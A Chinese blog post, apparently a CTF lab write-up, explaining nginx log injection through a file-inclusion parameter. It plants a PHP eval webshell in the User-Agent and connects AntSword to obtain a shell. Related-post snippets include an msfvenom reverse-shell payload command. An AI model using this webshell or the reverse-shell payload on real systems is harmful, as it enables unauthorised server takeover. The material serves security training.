日志注入上传 + 蚁剑

最新推荐文章于 2025-06-08 21:11:12 发布
最新推荐文章于 2025-06-08 21:11:12 发布
阅读量546 收藏 3
点赞数 19
文章标签: nginx http apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84908950/article/details/143520972
版权

思路基本通用    复现靶场:ctfshow-web4 

1、开靶场
修改成http协议

靶场是https开头 记得给请求头删掉s即可【后面几个图带https 我就不改了 其实是http】

2、判断中间件类型 考虑对应的log文件

【中间件 ---- 对应的文件及路径】

nginx     ---- /var/log/nginx/access.log      或者     /var/log/nginx/error.log   
apache  ---- /var/log/apache/access.log 

这里看到是nginx中间件 就准备去访问对应的文件 一个access和error 都试一试

3、尝试读取日志信息
(1)error.log文件     

?url=/var/log/nginx/error.log  

失败  没读到日志信息 

(2)access.log文件

?url=/var/log/nginx/access.log

4、抓包进bp 给UA加一句话木马再次上传

<?php eval($_POST['-5'])?>

 

放行后看页面:

明显比第一次要多了日志记录 说明加马成功(日志只做记录 不显示马内容)

5、蚁剑拿shell

 到这一步还是会莫名其妙小紧张哈哈 因为学upload的时候 看老哥们用的很熟练 就想跟着一起做

不过还是不知道怎么拿shell 每次都是撞运气 TuT

现在进行一个比较细致的使用步骤

**注意**:要和bp配合 bp抓到请求 先放行后 再进行操作 

【如果是蚁剑报错 timeout:10000 那么就马上考虑 是不是bp抓到了包 没放过去 导致蚁剑抓不到包提示超时】

(1)新建连接

由于是http 不需要证书

https则需要 https的话 bp抓包也需要证书

(2)测试是否成功

点击添加:

(3)进入文件管理 

6、关代理 提交flag

Codingwiz_Joy
关注
网络安全工具AntSword内存马使用
SHELLCODE_8BIT的博客
09-04 2030
测试环境:tomcat9、后渗透插件。
【网络安全】日志注入getshell
等风来
12-26 4162
中间件的日志文件通常用于保存网站的访问记录,其中包括了客户端发送的HTTP请求行、User-Agent、Referer等信息。这些日志文件对于网站的运维和安全分析非常有用。如果能够在HTTP请求中插入恶意代码,那么这些恶意代码就会被保存到日志文件中。当访问日志文件时,其中的恶意代码可能会被执行
一句话木马、sql注入的安装及使用
veinard_F的博客
05-20 4672
一、基本原理 sql注入主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限。它先破坏数据库,再对数据库服务器进行破坏。 sql的概述 浏览网站 发送一个请求SQL语言指令返回数据或执行结果通过web包装后的数据用户web服务端数据库系统 基本类型: 数字型和字符型的注入; 报错型SQL注入; 布尔/时间的SQL注入; 可联合查询的SQL注入; 判断注入类型: 1、数字型注入:id=1 and 1=2,若回显不正常则为数字型注入 2、字符型注入:上述测试若回显正常则为字符型注入 3、报错
的使用示例
2301_79711759的博客
10-31 310
连接密码为123(可以在一句话木马的指令中自定义)如图所示用右键点击白色部分,选择添加数据。URL地址为你创建的一句话木马网页地址。编码器和解码器都使用baseb4。然后点击添加就可以添加到目录了。一.创建一个一句话木马。右下角显示连接成功即可。
内存马检测排查手段
ZL_1618的博客
04-10 1673
内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存马因其隐蔽性等优点从而越来越盛行。
文件包含】——日志文件注入
qq_1182418846的博客
09-12 1071
本文主要根据做题内容的总结,如有错误之处,还请各位师傅指正。
文件包含漏洞-日志注入
superman66697的博客
08-16 2407
文件包含漏洞是 Web 应用程序中的一种常见漏洞。当应用程序允许用户控制包含在页面上的文件时,攻击者就可以利用这一点来包含恶意文件。这种恶意文件可能包含执行恶意代码,导致各种攻击,如代码执行、数据泄露或其他未授权的行为。日志注入是通过插入恶意数据到应用程序的日志文件来实施的攻击。当这些日志被其他系统或应用程序读取和解析时,攻击者的恶意数据可能会被执行。这通常利用了不安全的日志处理机制和文件包含漏洞的组合。
MySQL日志注入练习
uer1029的博客
04-21 663
阶段使用工具/技术成果指标信息收集御扫描/php探针获得phpMyAdmin路径漏洞利用SQL注入日志文件篡改获取Getshell权限获取权限/数据中国菜刀/获得服务器控制权。
antswordの加载器&源码
04-14
【蚂(AntSword)】是一款开源的Web管理工具,主要用于网站的安全检测与渗透测试。它提供了方便的界面,让安全研究人员可以便捷地进行网页的上传、下载、执行命令、数据库操作等一系列功能,帮助发现并修复网络...
安装包,使用教程在博主主页有
10-23
,全称为“渗透测试工具”,是一款开源的Web后端安全测试工具,主要用于网站的安全检测和漏洞挖掘。它的设计目标是提供一个简洁、高效且易用的界面,帮助安全研究人员进行Web安全测试。在本文中,我们将详细...
内网渗透(+MSF)
jklbnm12的博客
04-15 3085
0x01 192.168.2.244攻击 (1)使用的是之前本科实验室的同学在192.168.2.244/bigdata上留的一句话木马 (2)因为本人技术有限,只能采用上传后门的方式来拿到shell,好在足已满足我上传木马的需求。在这一步只需要使用msf生成木马(使用theFatRat生成的木马稳定性不怎么滴,而且不能绕过火绒)。最后产生的木马效果最好如下: msf>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.4.215 LPORT=
使用
03-17
### 关于的使用方法 是一款功能强大的WebShell管理工具,支持多种编程语言环境下的反序列化和命令执行操作。以下是关于其基本原理以及如何配置和使用的详细介绍: #### 基本工作原理 的核心机制在于...
Spring MVC : ServletRequest 注入原理分析 1 - 为什么可以注入成功?
Details Inside Spring
03-09 587
概述 在Spring应用中,将一个较大作用域的bean注入到一个较小作用域的bean中是很自然的一件事情,因为往较小作用域bean中注入较大作用域bean时,较大作用域的bean已经存在了。但是,如果反过来,将一个较小作用域的bean往一个较大作用域的bean中注入时,较小作用域的bean可能根本不存在,比如Spring MVC应用中,如果要将一个ServletRequest注入到一个单例作用域的...
grpc和http的区别
最新发布
2301_76723322的博客
06-08 356
摘要: gRPC和HTTP是两种主要的通信协议,各有特点。HTTP基于文本(如JSON/XML),兼容性强,适合Web开发;gRPC基于HTTP/2和二进制协议(Protobuf),性能更高,支持流式通信,适合微服务等高性能场景。HTTP采用RESTful风格,接口灵活;gRPC通过.proto定义服务,自动生成代码,开发更高效。gRPC适合内部系统,HTTP更适用于公开API。选择时需权衡性能、兼容性及具体场景需求。
HTTP 重定向详解
weixin_43820463的博客
06-08 288
HTTP重定向是服务器通过3xx状态码和Location头指示客户端访问新URL的机制。常见状态码包括:301(永久)、302(临时)、303(POST后GET跳转)、307/308(保留请求方法)。主要应用于域名迁移、HTTPS升级、URL规范化、权限跳转和短链接等场景。Nginx可通过return指令实现重定向,浏览器自动处理跳转,而编程HTTP客户端通常需设置参数才跟随重定向。301重定向对SEO友好,推荐用于永久URL变更。
【Linux网络篇】:从HTTPHTTPS协议---加密原理升级与安全机制的全面解析
2301_82347435的博客
06-05 1029
HTTPS协议原理及应用 HTTPS是在HTTP基础上引入加密层,解决明文传输的安全问题。文章首先介绍了加密的必要性,包括保密性、完整性和真实性三大安全需求。然后详细分析了四种加密方案: 仅使用对称加密存在密钥分发难题 仅用非对称加密存在单向安全缺陷 双非对称加密效率低下且有中间人攻击风险 非对称+对称加密组合方案 重点剖析了中间人攻击原理:攻击者替换公钥获取通信密钥。最后提出解决方案——CA证书机制,通过权威机构认证确保公钥合法性。文章从基础概念到实际应用逐步深入,完整呈现了HTTPS的安全实现机制。
HTTP、WebSocket、SSE 对比
笔记
06-02 558
HTTP、WebSocket与SSE特性对比及选型指南 本文对比了HTTP、WebSocket和SSE三种网络协议的核心特性。HTTP采用请求-响应模式,适合传统API交互但实时性差;WebSocket支持全双工通信,适合实时应用但实现复杂;SSE允许服务器单向推送,简单易用但不支持双向交互。三者各有优劣:HTTP兼容性好但效率低,WebSocket实时性强但需手动管理连接,SSE轻量但功能有限。文章通过Java示例演示各协议实现,并给出选型建议:WebSocket适合双向实时场景(如聊天),SSE适用于服
Web后端开发(SpringBootWeb、HTTP、Tomcat快速入门)
2401_88455976的博客
06-04 1254
超文本传输协议,规定了浏览器和服务器之间数据传输的规则。1.基于TCP协议:面向连接,安全2.基于请求-响应模型的:一次请求一次响应3.HTTP协议是无状态的协议:对于事务处理没有记忆能力。每次请求-响应都是独立的。缺点:多次请求间不能共享数据。优点:速度快Web服务器是一个软件程序,对HTTP协议的操作进行封装,使得程序员不必直接对协议进行操作,让Web开发更加便捷。主要功能是“提供网上信息浏览服务”。Tomcat。
如何基于Mihomo Party http端口配置git与bash命令行代理
m0_61947256的博客
06-05 477
点击内核设置后即可查看默认7892端口,开启允许局域网连接
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值